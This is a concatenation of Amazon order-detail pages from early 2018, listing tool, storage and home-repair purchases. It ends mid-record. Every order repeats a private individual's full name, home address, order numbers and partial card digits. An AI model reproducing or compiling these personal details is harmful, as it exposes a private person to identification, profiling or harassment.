Total: $1,608.75 Shipped on April 27, 2018 Items Ordered 1 of: Sony FDR-AX100/B 4K Video Camera with 3.5-Inch LCD (Black), SONY Price $1,498.00 (Black) and Travel Charger Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Shipped on April 27, 2018 Items Ordered Price 1 of: Bosch WD7LUB Worm Drive Lubricant $11.29 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: One-Day Shipping Payment information Payment Method: Item(s) Subtotal: $1,509.29 Billing address Total before tax: $1,521.27 BRIAN J COADY Estimated tax to be collected: $87.48 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$1,608.75 United States Credit Card transactions AmazonPLCC ending in 3157: April 27, 2018:$1,592.59 AmazonPLCC ending in 3157: April 27, 2018: $16.16 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3906584-6530647 Order Placed: April 24, 2018 Amazon.com order number: 113-3906584-6530647 Order Total: $61.38 Shipped on April 25, 2018 Items Ordered Price 1 of: Fein 33901131980 FMM350 MultiMaster System Case Sold by: CPO Outlets (seller profile) $61.38 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $61.38 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $61.38 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$61.38 United States Credit Card transactions AmazonPLCC ending in 3157: April 25, 2018:$61.38 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #113-3123100-7376262 Order Placed: April 24, 2018 Amazon.com order number: 113-3123100-7376262 Order Total: $69.67 Shipped on April 25, 2018 Items Ordered Price 1 of: SmartGuard 3-Year Camera Accidental Protection Plan ($1500-$1750) Sold by: Warrantech (seller profile) $65.88 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $65.88 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $65.88 BRIAN J COADY Estimated tax to be collected: $3.791454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$69.67 United States Credit Card transactions AmazonPLCC ending in 3157: April 25, 2018:$69.67 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2742341-0769034 Order Placed: February 2, 2018 Amazon.com order number: 111-2742341-0769034 Order Total: $41.00 Shipped on February 3, 2018 Items Ordered Price 1 of: StoreWall Power Strip Set Sold by: The Garage Project Online (seller profile) $32.50 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $32.50 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $8.50 Billing address Total before tax: $41.00 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$41.00 United States Credit Card transactions AmazonPLCC ending in 3157: February 3, 2018:$41.00 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7026743-8756236 Order Placed: February 2, 2018 Amazon.com order number: 111-7026743-8756236 Order Total: $155.21 Shipped on February 2, 2018 Items Ordered 2 of: Bosch L-RACK-S Expandable Storage Shelf for use with L-RACK Click and Go Storage System Sold by: Amazon.com Services LLC Price $23.99 Condition: New 2 of: Bosch Bosch LST72-OD 72mm Drawer for use with L-RACK Click and Go Storage System Sold by: Amazon.com Services LLC $11.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on February 3, 2018 Items Ordered 1 of: Sortimo Bosch L-Boxx 238 Empty-Gr3 Innovative Delivery Sold by: (seller profile) Price $79.11 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Print this page for your records. Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $151.07 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $151.07 Estimated tax to be collected: $4.14 ---- WASHINGTON, DC 20010 Grand Total:$155.21 United States Credit Card transactions AmazonPLCC ending in 3157: February 3, 2018:$155.21 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1979447-8531443 Order Placed: February 2, 2018 Amazon.com order number: 111-1979447-8531443 Order Total: $17.99 Shipped on February 2, 2018 Items Ordered Price 1 of: VacuumPal Replacements Parts for All Neato Botvac,Neato Botvac D & Connected $17.99 Series 70e 75 80 85 D75 D80 D85 D3 D5 Including High-Performance Filter x 4 & Side Brush x 4 Sold by: VACUUMPAL (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $17.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $17.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.99 United States Credit Card transactions AmazonPLCC ending in 3157: February 2, 2018:$17.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-8170152-1545813 Order Placed: January 30, 2018 Amazon.com order number: 111-8170152-1545813 Order Total: $125.69 Shipped on January 31, 2018 Items Ordered 1 of: Professional Asbestos Do It Yourself Test Kit by EIT – Prepaid Lab Testing and Shipping Perfect for your Home or Business, Single Pack Sold by: EIT Supply (seller profile) Price $39.99 Condition: New 1 of: PRO-LAB Asbestos Do It Yourself Test Kit AS108 Sold by: Amazon.com Services LLC $6.99 Condition: New 1 of: 3M LeadCheck Swabs, 8-Pack Sold by: Amazon.com Services LLC $21.53 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 31, 2018 Items Ordered 1 of: Proslat 3230 Probin Storage Bin Designed for PVC Slatwall, Large, 3-Pack Sold by: Amazon.com Services LLC Price $52.52 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Print this page for your records. Payment information Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $121.03 Shipping & Handling: $0.00 ---- Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $121.03 Estimated tax to be collected: $4.66 ---- WASHINGTON, DC 20010 Grand Total:$125.69 United States Credit Card transactions AmazonPLCC ending in 3157: January 31, 2018:$125.69 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1711995-6193030 Order Placed: January 29, 2018 Amazon.com order number: 111-1711995-6193030 Order Total: $18.99 Shipped on January 30, 2018 Items Ordered Price 1 of: Gracelove 63mm PVC Cutter Black Pipe Cutter Cuts up to 2-1/2" Pipe Capacity Ratcheting Cut Sold by: eshion (seller profile) $18.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $18.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $18.99BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$18.99 United States Credit Card transactions AmazonPLCC ending in 3157: January 30, 2018:$18.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6399631-5220227 Order Placed: January 27, 2018 Amazon.com order number: 111-6399631-5220227 Order Total: $141.98 Shipped on January 28, 2018 Items Ordered Price 1 of: Bosch ADS181BL Bare-Tool with L-BOXX (Discontinued by Manufacturer) $141.98 Sold by: CPO Outlets (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Grand Total:$141.98 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $141.98 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $141.98 Estimated tax to be collected: $0.00 WASHINGTON, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: January 28, 2018:$141.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7068660-4792233 Order Placed: January 27, 2018 Amazon.com order number: 111-7068660-4792233 Order Total: $121.60 Shipped on January 28, 2018 Items Ordered Price 1 of: Bosch MA55 Auto Feed Attachment for Screw Guns $114.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Grand Total:$121.60 Payment Method: Amazon.com Store Card | Last digits: 3157 Item(s) Subtotal: $114.99 Shipping & Handling: $0.00 Billing address BRIAN J COADY 1454 MONROE ST NW Total before tax: $114.99 Estimated tax to be collected: $6.61 WASHINGTON, DC 20010 United States Credit Card transactions AmazonPLCC ending in 3157: January 28, 2018:$121.60 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2512521-3097055 Order Placed: January 27, 2018 Amazon.com order number: 111-2512521-3097055 Order Total: $96.03 Shipped on January 28, 2018 Items Ordered Price 1 of: Bosch SKC181-101 18-Volt Lithium-Ion Starter Kit with (1) 4.0 Ah Battery and Charger Sold by: CPO Outlets (seller profile) $96.03 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $96.03 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $96.03BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$96.03 United States Credit Card transactions AmazonPLCC ending in 3157: January 28, 2018:$96.03 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9282100-4533843 Order Placed: January 24, 2018 Amazon.com order number: 111-9282100-4533843 Seller's order number: 1100910786 Order Total: $35.42 Shipped on January 25, 2018 Items Ordered Price 1 of: Fiskars PowerGear Bolt Cutter (14 Inch) Sold by: Life and Home (seller profile) $35.42 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $35.42 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $35.42BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$35.42 United States Credit Card transactions AmazonPLCC ending in 3157: January 25, 2018:$35.42 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2655829-3816216 Order Placed: January 23, 2018 Amazon.com order number: 111-2655829-3816216 Order Total: $170.23 Shipped on January 23, 2018 Items Ordered Price 1 of: Bosch T3916SC 2-11/16 In. SDS-plus SPEEDCORE Thin-wall Core Bit $63.58 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 24, 2018 Items Ordered Price 1 of: The Dust Deputy $102.99 Sold by: Life and Home (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $166.57 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $166.57 BRIAN J COADY Estimated tax to be collected: $3.66 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$170.23 United States Credit Card transactions AmazonPLCC ending in 3157: January 24, 2018:$170.23 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-7664003-4604258 Order Placed: January 21, 2018 Amazon.com order number: 111-7664003-4604258 Seller's order number: 1098332 Order Total: $34.31 Shipped on January 22, 2018 Items Ordered Price 1 of: Bosch FB034 2-1/8 In. Forstner Bit Sold by: Lake Effect Warehouse (seller profile) $29.62 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $29.62 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $4.69 Billing address Total before tax: $34.31BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$34.31 United States Credit Card transactions AmazonPLCC ending in 3157: January 22, 2018:$34.31 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-5478418-3057822 Order Placed: January 21, 2018 Amazon.com order number: 111-5478418-3057822 Order Total: $159.16 Shipped on January 22, 2018 Items Ordered 1 of: Guardsman Wood Repair Filler Sticks -5 Colors Plus Sharpener -Repair and Restore Scratched Furniture -500300 Sold by: Amazon.com Services LLC Price $5.49 Condition: New 1 of: General Tools 29 Plastic Protractor and Angle Finder, Outside, Inside, Sloped Angles, 0° to 180°, GENERAL TOOLS Sold by: Amazon.com Services LLC $6.20 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 22, 2018 Items Ordered 1 of: Bosch HC8521 2-5/8-Inch x 12-Inch SDS Max Core Cutter Sold by: Amazon.com Services LLC Price $113.00 Condition: New 1 of: Fooing W752 Multi Angle Measuring Ruler, Template Measurement Tool for All Angles & Shapes,Multi Functional Ruler Best for Craftsmen Handymen Builders Carpenter DIY(Yellow,2Pack) Sold by: Star River (seller profile) $8.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 Print this page for your records. Shipping Speed: Two-Day Shipping Shipped on January 23, 2018 Items Ordered Price 1 of: O'BERRY ENTERPRISES 3233 "SQUEEEEEK NO MORE" FLOOR REPAIR KIT, $18.30 O'BERRY ENTERPRISES Sold by: Life and Home (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $151.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $151.98BRIAN J COADY Estimated tax to be collected: $7.181454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$159.16 United States Credit Card transactions AmazonPLCC ending in 3157: January 23, 2018: $18.30 AmazonPLCC ending in 3157: January 22, 2018:$140.86 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7542475-7749852 Order Placed: January 20, 2018 Amazon.com order number: 111-7542475-7749852 Order Total: $75.77 Shipped on January 21, 2018 Items Ordered 1 of: Bosch HDC100 SDS-Plus Dust Collection Attachment Sold by: CPO Outlets (seller profile) Price $75.77 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $75.77 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $75.77 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$75.77 United States Credit Card transactions AmazonPLCC ending in 3157: January 21, 2018:$75.77 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6115641-1233054 Order Placed: January 20, 2018 Amazon.com order number: 111-6115641-1233054 Order Total: $94.52 Shipped on January 21, 2018 Items Ordered Price 1 of: Bosch HC2012B5 5-Piece 3/16 In. x 8 In. SDS-plus Bulldog Rotary Hammer Bits $41.40 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 21, 2018 Items Ordered Price 2 of: Bosch L-RACK-S Expandable Storage Shelf for use with L-RACK Click and Go $23.99 Storage System Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $89.38 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 ---- Billing address Total before tax: $89.38 BRIAN J COADY Estimated tax to be collected: $5.14 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$94.52 United States Credit Card transactions AmazonPLCC ending in 3157: January 21, 2018:$50.74 AmazonPLCC ending in 3157: January 21, 2018:$43.78 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-5498630-9041829 Order Placed: January 20, 2018 Amazon.com order number: 111-5498630-9041829 Order Total: $35.51 Shipped on January 21, 2018 Items Ordered Price 1 of: Bosch HCK001 7-Piece SDS-plus Rotary Hammer Drill Bit Set Sold by: Amazon.com Services LLC $27.59 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $27.59 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Billing address Total before tax: $33.58 BRIAN J COADY Estimated tax to be collected: $1.931454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$35.51 United States Credit Card transactions AmazonPLCC ending in 3157: January 21, 2018:$35.51 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3242583-5350635 Order Placed: January 20, 2018 Amazon.com order number: 111-3242583-5350635 Order Total: $47.97 Shipped on January 23, 2018 Items Ordered Price 1 of: Wen-Tai SMD SMT Component Small-Part Hobby Storage Snap Box and Organizer (9 boxes) Sold by: 5th Postulate Engineering (seller profile) $10.99 Condition: New 1 of: WenTai Component SMD Med Storage Boxes (36 boxes) Sold by: 5th Postulate Engineering (seller profile) $32.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $43.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $3.99 Billing address Total before tax: $47.97BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$47.97 United States Credit Card transactions AmazonPLCC ending in 3157: January 23, 2018:$47.97 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1320410-7713064 Order Placed: January 18, 2018 Amazon.com order number: 111-1320410-7713064 Seller's order number: 363508 Order Total: $28.95 Shipped on January 18, 2018 Items Ordered Price 1 of: Dyna Glo SP-KHW-095-I Replacement Wick with Igniter Sold by: IndustrialSupplies (seller profile) $28.95 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $28.95 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $28.95BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$28.95 United States Credit Card transactions AmazonPLCC ending in 3157: January 18, 2018:$28.95 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-9970557-1720207 Order Placed: January 16, 2018 Amazon.com order number: 111-9970557-1720207 Order Total: $85.64 Shipped on January 17, 2018 Items Ordered Price 1 of: Bosch i-Boxx53 for use with Click and Go Storage System, Empty Box $21.99 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Shipped on January 17, 2018 Items Ordered Price 1 of: Bosch L-Boxx-3D Storage Box with Space for Removable Drawers $59.00 Sold by: Amazon.com Services LLC Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $80.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $80.99 BRIAN J COADY Estimated tax to be collected: $4.65 1454 MONROE ST NW ---- WASHINGTON, DC 20010 Grand Total:$85.64 United States Credit Card transactions AmazonPLCC ending in 3157: January 17, 2018:$23.25 AmazonPLCC ending in 3157: January 17, 2018:$39.14 AmazonPLCC ending in 3157: January 17, 2018:$23.25 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7705188-2752204 Order Placed: January 16, 2018 Amazon.com order number: 111-7705188-2752204 Order Total: $23.98 Shipped on January 17, 2018 Items Ordered Price 1 of: WenTai Component SMD XL Storage Boxes (12 boxes) Sold by: 5th Postulate Engineering (seller profile) $19.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $19.99 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $3.99 Billing address Total before tax: $23.98 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$23.98 United States Credit Card transactions AmazonPLCC ending in 3157: January 17, 2018:$23.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-6176377-8804213 Order Placed: January 16, 2018 Amazon.com order number: 111-6176377-8804213 Order Total: $19.89 Shipped on January 17, 2018 Items Ordered Price 1 of: 1" Smooth Shank Solid Copper Roofing Nails 11 Gauge USA Made -QTY 100 Sold by: Raw Products Corp (seller profile) $19.89 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Expedited Shipping Payment information Payment Method: Item(s) Subtotal: $19.89 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $19.89 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$19.89 United States Credit Card transactions AmazonPLCC ending in 3157: January 17, 2018:$19.89 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-3901389-2603432 Order Placed: January 16, 2018 Amazon.com order number: 111-3901389-2603432 Order Total: $17.55 Shipped on January 17, 2018 Items Ordered Price 1 of: 1 1/2" x 10-GAUGE 4D SMOOTH COPPER ROOFING/SLATING NAILS 1lb Sold by: FastenerUSA (seller profile) $17.55 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $17.55 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $17.55 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.55 United States Credit Card transactions AmazonPLCC ending in 3157: January 17, 2018:$17.55 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-1316657-0722655 Order Placed: January 16, 2018 Amazon.com order number: 111-1316657-0722655 Order Total: $17.98 Shipped on January 17, 2018 Items Ordered Price 1 of: Bosch LST92-OD LST 92 Deep Drawer for use with Click and Go Storage System $17.98 Sold by: CPO Outlets (seller profile) Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Two-Day Shipping Payment information Payment Method: Item(s) Subtotal: $17.98 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $0.00 Billing address Total before tax: $17.98 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$17.98 United States Credit Card transactions AmazonPLCC ending in 3157: January 17, 2018:$17.98 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-0075891-7886626 Order Placed: January 16, 2018 Amazon.com order number: 111-0075891-7886626 Order Total: $83.51 Shipped on January 16, 2018 Items Ordered Price 1 of: Bosch Bosch LST72-OD 72mm Drawer for use with L-RACK Click and Go Storage System Sold by: Amazon.com Services LLC $11.99 Condition: New 1 of: Bosch i-Boxx72 for use with Click and Go Storage System, Empty Box Sold by: Amazon.com Services LLC $28.99 Condition: New 1 of: Bosch HC2309 9-Piece SDS-plus Bulldog Anchor Drive Installation Kit Sold by: Amazon.com Services LLC $37.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Same-Day Delivery Payment information Payment Method: Item(s) Subtotal: $78.97 Amazon.com Store Card | Last digits: 3157 Shipping & Handling: $5.99 Free Shipping: -$5.99 Billing address BRIAN J COADY Total before tax: $78.97 1454 MONROE ST NW Estimated tax to be collected: $4.54 WASHINGTON, DC 20010 United States Grand Total:$83.51 Credit Card transactions AmazonPLCC ending in 3157: January 16, 2018:$83.51 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates Final Details for Order #111-9311582-8665008 Order Placed: January 10, 2018 Amazon.com order number: 111-9311582-8665008 Order Total: $11.74 Shipped on January 12, 2018 Items Ordered Price 1 of: Sizzix Originals Rectangles by E.L. Smith Die Sold by: china1324 (seller profile) $7.00 Condition: Used -Like New Package opened but still here. Never used. Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $7.00 Visa | Last digits: 4452 Shipping & Handling: $4.74 Billing address Total before tax: $11.74 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.74 United States Credit Card transactions Visa ending in 4452: January 12, 2018:$11.74 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7818076-1109059 Order Placed: January 10, 2018 Amazon.com order number: 111-7818076-1109059 Order Total: $11.99 Shipped on January 11, 2018 Items Ordered Price 1 of: Master Flow FlexRIGHT Flexible Duct Elbow -4 in. -16 in. -2 Elbows/Kit Sold by: eCommerceCentral (seller profile) $11.99 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Economy Shipping Payment information Payment Method: Item(s) Subtotal: $11.99 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $11.99 BRIAN J COADY Estimated tax to be collected: $0.001454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$11.99 United States Credit Card transactions Visa ending in 4452: January 11, 2018:$11.99 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-7763017-2369819 Order Placed: January 10, 2018 Amazon.com order number: 111-7763017-2369819 Order Total: $9.75 Shipped on January 12, 2018 Items Ordered Price 1 of: GREAT STUFF Pond & Stone 12 oz Insulating Foam Sealant Sold by: Amazon.com Services LLC $9.22 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: No-Rush Shipping Payment information Payment Method: Item(s) Subtotal: $9.22 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $9.22 BRIAN J COADY Estimated tax to be collected: $0.53 1454 MONROE ST NW WASHINGTON, DC 20010 Grand Total:$9.75 United States Credit Card transactions Visa ending in 4452: January 12, 2018:$9.75 Conditions of Use | Privacy Notice © 1996-2021, Amazon.com, Inc. or its affiliates To view the status of your order, return to Order Summary. Final Details for Order #111-2939997-5028267 Order Placed: January 10, 2018 Amazon.com order number: 111-2939997-5028267 Order Total: $3.88 Shipped on January 13, 2018 Items Ordered Price 1 of: Touch 'n Foam 4001031212 MaxFill Maximum Expanding Sealant Sold by: Amazon.com Services LLC $3.67 Condition: New Shipping Address: Brian J Coady 1454 MONROE ST NW WASHINGTON, DC 20010-3139 United States Shipping Speed: Standard Shipping Payment information Payment Method: Item(s) Subtotal: $3.67 Visa | Last digits: 4452 Shipping & Handling: $0.00 Billing address Total before tax: $3.67 BRIAN J COADY Estimated tax to be collected: $0.21 1454 